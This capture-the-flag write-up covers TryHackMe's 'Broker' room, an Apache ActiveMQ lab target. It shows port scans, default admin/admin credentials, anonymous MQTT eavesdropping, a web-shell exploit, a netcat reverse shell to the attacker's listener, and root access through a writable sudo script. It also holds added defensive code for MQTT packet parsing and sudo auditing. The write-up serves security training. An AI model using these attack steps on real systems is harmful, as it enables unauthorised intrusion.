Broker — TryHackMe

This is the write-up for TryHackMe's room named Broker. The description says: Paul and Max found a way to chat at work by using a certain kind of software. They think they outsmarted their boss, but do not seem to know that eavesdropping is quite possible… They better be careful… Interesting. This room can be found here:

As always, let's scan the target with nmap to see what is running on it.



# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p-

└─$ sudo nmap -sS -Pn -T4 -p-
22/tcp open ssh
1883/tcp open mqtt
8161/tcp open patrol-snmp
42449/tcp open unknown

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,1883,8161,42449

└─$ sudo nmap -O -A -Pn -T4 -p22,1883,8161,42449

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4c:75:a0:7b:43:87:70:4f:70:16:d2:3c:c4:c5:a4:e9 (RSA)
| 256 f4:62:b2:ad:f8:62:a0:91:2f:0a:0e:29:1a:db:70:e4 (ECDSA)
|_ 256 92:d2:87:7b:98:12:45:93:52:03:5e:9e:c7:18:71:d5 (ED25519)
1883/tcp open mqtt?
8161/tcp open http Jetty 7.6.9.v20130131
|_http-server-header: Jetty(7.6.9.v20130131)
|_http-title: Apache ActiveMQ
42449/tcp open tcpwrapped

Do a TCP portscan on all ports with port number greater than 1000 and smaller than 10000! Which TCP ports do you find to be open? (counting up)

So from the nmap scan above, the required ports are 1883 and 8161.

What is the name of the software they use?

Again, nmap clearly shows the software used is ActiveMQ. Port 8161 is also running HTTP, so let's check it out in the browser.

Yes, it is indeed ActiveMQ. So let's brute-force the directories, which might prove useful, using ffuf.


└─$ ffuf -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
:: Method : GET
:: URL :
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
images [Status: 302, Size: 0, Words: 1, Lines: 1]
index.html [Status: 200, Size: 5968, Words: 2626, Lines: 134]
admin [Status: 401, Size: 1278, Words: 977, Lines: 33]
api [Status: 302, Size: 0, Words: 1, Lines: 1]
styles [Status: 302, Size: 0, Words: 1, Lines: 1]
[Status: 200, Size: 5968, Words: 2626, Lines: 134]
:: Progress: [882184/882184] :: Job [1/1] :: 987 req/sec :: Duration: [0:17:30] :: Errors: 0 ::

/admin looks interesting. Let's access this page, but it asks for a username and password. Searching around found here that the default credentials for the Apache ActiveMQ Administration Console are just admin/admin. Tried them and it worked, and also noticed a version number, i.e. 5.9.0.

Which videogame are Paul and Max talking about?

At this point it is clear that we need to talk to the MQTT daemon running on port 1883 (check the nmap scans). So searching for an MQTT client found this:

Also found this link very useful:

But we still need a "topic" for subscribe() to subscribe to and receive messages from. This was found here:

So I edited the code from the GitHub link and added the topic, the IP address of the target and the MQTT version, which needed to be 3.1:

Ran the code with python3.
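The version detail matters at the wire level: MQTT 3.1 and 3.1.1 announce themselves differently in the CONNECT packet, and a broker that only speaks 3.1 rejects the newer form with a CONNACK return code. The following is an added example, not code from this write-up or from the GitHub client it used, that builds and decodes CONNECT and CONNACK packets with the standard library only, so a broker operator or sensor can see exactly what a client's CONNECT carries, including whether it authenticated at all; the client IDs and credentials in it are constructed.

```python
import struct

# CONNECT carries a protocol name and level: 3.1 is ("MQIsdp", 3), 3.1.1 is ("MQTT", 4).
# A broker that only speaks 3.1 answers a level-4 CONNECT with CONNACK return code 1.
PROTOCOL = {"3.1": (b"MQIsdp", 3), "3.1.1": (b"MQTT", 4)}
CONNACK = {0: "accepted", 1: "unacceptable protocol version", 2: "identifier rejected",
           3: "server unavailable", 4: "bad user name or password", 5: "not authorized"}
def _str(b):  # MQTT string: 2-byte big-endian length prefix followed by the bytes
    return struct.pack("!H", len(b)) + b
def _remaining_length(n):  # MQTT variable-length integer, 7 bits per byte, low byte first
    out = bytearray()
    while n > 127:
        n, byte = divmod(n, 128)
        out.append(byte | 0x80)
    return bytes(out + bytes([n]))

def build_connect(client_id, version="3.1", username=None, password=None, keepalive=60):
    """Encode a CONNECT packet; connect flags 0x80/0x40 announce username/password."""
    name, level = PROTOCOL[version]
    flags, payload = 0x02, _str(client_id.encode())  # 0x02 = clean session
    if username is not None:
        flags |= 0x80
        payload += _str(username.encode())
        if password is not None:
            flags |= 0x40
            payload += _str(password.encode())
    body = _str(name) + bytes([level, flags]) + struct.pack("!H", keepalive) + payload
    return b"\x10" + _remaining_length(len(body)) + body

def parse_connect(packet):
    """Decode the CONNECT fields a broker log or network sensor would inspect."""
    if packet[0] != 0x10:
        raise ValueError("not a CONNECT packet")
    i, n, mult = 1, 0, 1
    while True:  # decode remaining length
        n, mult, i = n + (packet[i] & 0x7F) * mult, mult * 128, i + 1
        if not packet[i - 1] & 0x80:
            break
    body = packet[i:i + n]
    name_len = struct.unpack("!H", body[:2])[0]
    name, level, flags = body[2:2 + name_len], body[2 + name_len], body[3 + name_len]
    version = next((v for v, np in PROTOCOL.items() if np == (name, level)), "unknown")
    return {"version": version, "clean_session": bool(flags & 0x02),
            "username_present": bool(flags & 0x80), "password_present": bool(flags & 0x40)}

def parse_connack(packet):
    """Return (return_code, meaning) from a broker's 4-byte CONNACK."""
    if len(packet) != 4 or packet[0] != 0x20 or packet[1] != 2:
        raise ValueError("not a CONNACK packet")
    return packet[3], CONNACK.get(packet[3], "reserved")
```

A CONNECT whose username_present flag is clear is an anonymous session; a broker that answers it with return code 0 is accepting unauthenticated subscribers, which is the condition the room relies on.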

Voila! We are able to see the chat between Paul and Max, and the video game's name is in this chat. Great. Now we need to exploit some vulnerability in this version of ActiveMQ to move forward. Searchsploit revealed a vulnerability which was also applicable to 5.9.0.

Reading the info for this Metasploit module, I found a link to the CVE for the vulnerability:

For some reason the Metasploit module for exploitation doesn't work, so searching around for any available exploit found this one on GitHub:

It was pretty simple to run:

python3 -u

This put a web shell at and we used it like to get remote code execution.

Reverse Shell

Now, to gain a reverse shell, I tried a few payloads and this one worked and gave us a reverse shell. Note: start a netcat listener on the attacking machine before executing the reverse shell payload URL, and replace the IP address with your own:

nc 9999 -e /bin/sh

Upgrade and Stabilize Shell

Run the following commands on the target to upgrade the current shell:

/usr/bin/script -qc /bin/bash /dev/null
Ctrl+Z to background the shell
stty raw -echo
export TERM=xterm


The flag was in the same directory where we got our reverse shell:

Privilege Escalation

Running sudo -l indicated that we can run in the /opt/apache-activemq-5.9.0 directory. Also, the current user activemq has write permission on this file.

So we can easily get root by adding the following code in using nano, as vi was not available on the target:

import os

and then running it with sudo:

We are root and found the root flag at /root/root.txt.
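The underlying weakness here is a sudo rule that points at a file the service account can modify. As an added example, not from the write-up, here is a small audit that parses sudo -l output and flags any referenced file the account can rewrite, or could replace because its parent directory is writable; the sudo -l text and the temporary files in demo() are constructed, and the permission check deliberately ignores root's override so the answer reflects the unprivileged account.

```python
import os, re, shutil, stat, tempfile

# Matches the command lines of `sudo -l` output, e.g.
#     (ALL) NOPASSWD: /usr/bin/python3 /opt/apache-activemq-5.9.0/some_script.py
SUDO_LINE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S.*)$")

def parse_sudo_l(text):
    """Yield (runas, nopasswd, argv) for every command line in `sudo -l` output."""
    for line in text.splitlines():
        m = SUDO_LINE.match(line)
        if m:
            yield m.group("runas"), "NOPASSWD:" in m.group("tags"), m.group("cmd").split()

def can_write(path, uid, gids):
    """Permission-bit check for the given account; root's override is deliberately ignored."""
    st = os.stat(path)
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)

def audit_sudo_l(text, uid, gids):
    """(command, path, reason) for each sudo-rule file the account can rewrite or replace."""
    findings = []
    for _runas, _nopasswd, argv in parse_sudo_l(text):
        for arg in argv:
            if not (os.path.isabs(arg) and os.path.isfile(arg)):
                continue
            if can_write(arg, uid, gids):
                findings.append((argv[0], arg, "file writable"))
            elif can_write(os.path.dirname(arg), uid, gids):
                findings.append((argv[0], arg, "parent directory writable"))
    return findings

def demo():
    """Constructed scenario: two scripts under sudo, one rewritable, one replaceable (0o700 dir)."""
    d = tempfile.mkdtemp()
    weak, strong = os.path.join(d, "weak.py"), os.path.join(d, "strong.py")
    try:
        for path, mode in ((weak, 0o664), (strong, 0o444)):
            open(path, "w").close()
            os.chmod(path, mode)
        sudo_output = ("User activemq may run the following commands on broker:\n"  # constructed
                       f"    (ALL) NOPASSWD: /usr/bin/python3 {weak}\n"
                       f"    (ALL) NOPASSWD: /usr/bin/python3 {strong}\n")
        findings = audit_sudo_l(sudo_output, os.geteuid(), set(os.getgroups()))
        return [f for f in findings if f[1].startswith(d)]  # ignore the interpreter itself
    finally:
        shutil.rmtree(d)
```

Either finding is a root-equivalent misconfiguration: the fix is a root-owned, non-writable script in a root-owned directory, or no sudo rule at all.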

This was an interesting room and the spying on the chat part was a winner for me. If you like the write-up please clap and follow me.